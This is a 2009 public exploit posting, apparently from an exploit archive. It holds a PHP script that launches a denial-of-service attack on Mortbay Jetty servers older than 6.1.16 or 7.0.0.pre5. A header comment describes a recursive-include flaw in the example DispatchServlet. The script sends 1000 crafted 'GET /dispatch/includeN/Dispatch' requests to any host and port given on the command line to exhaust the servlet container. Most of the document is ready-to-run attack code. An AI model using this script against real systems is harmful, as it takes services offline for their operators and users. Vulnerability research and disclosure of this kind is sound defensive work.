jetty-dos.txt
Posted on 08 May 2009
<?php #################################################################################### # Mortbay Jetty <= 7.0.0-pre5 Dispatcher Servlet DoS # # Affected Software: Jetty < 6.1.16, < 7.0.0.pre5 (all platforms) # Author: Ikki (http://blog.nibblesec.org/) # # Description: # The dispatcher servlet (com.acme.DispatchServlet) is prone to a DoS vulnerability. # This example servlet is meant to be used as a resources dispatcher, however a # malicious aggressor may abuse this functionality in order to cause a recursive # inclusion. In detail, it is possible to abuse the method # com.acme.DispatchServlet.doGet(DispatchServlet.java:203) forcing the application # to recursively include the "DispatchServlet". # As a result, it is possible to trigger a "java.lang.StackOverflowError" and # consequently an internal server error (500). Multiple requests may easily affect # the availability of the entire servlet container. #################################################################################### error_reporting(E_ALL&E_NOTICE); echo(" :: Jetty Dispatcher Servlet DoS - http://blog.nibblesec.org :: "); echo(" :: Affected Software: Jetty < 6.1.16, < 7.0.0.pre5 - all platforms :: "); if($argc==3){ $cont=0; $reqNum=1000; $req = "GET /dispatch/includeN/Dispatch HTTP/1.0 "; $req .= "Host: ".$argv[1]." "; $req .= " "; while($cont<$reqNum){ $sock = fsockopen($argv[1],$argv[2],$errno,$errstr,30); if(!$sock){ echo " No response from ".$argv[1]; die; } fwrite($sock,$req); fclose($sock); echo("."); $cont++; } echo (" Check your servlet container, after " . $reqNum . " requests: " . "http://" . $argv[1] . ":" . $argv[2] . "/"); }else{ echo(" php " . $argv[0] . " <host> <port> "); }
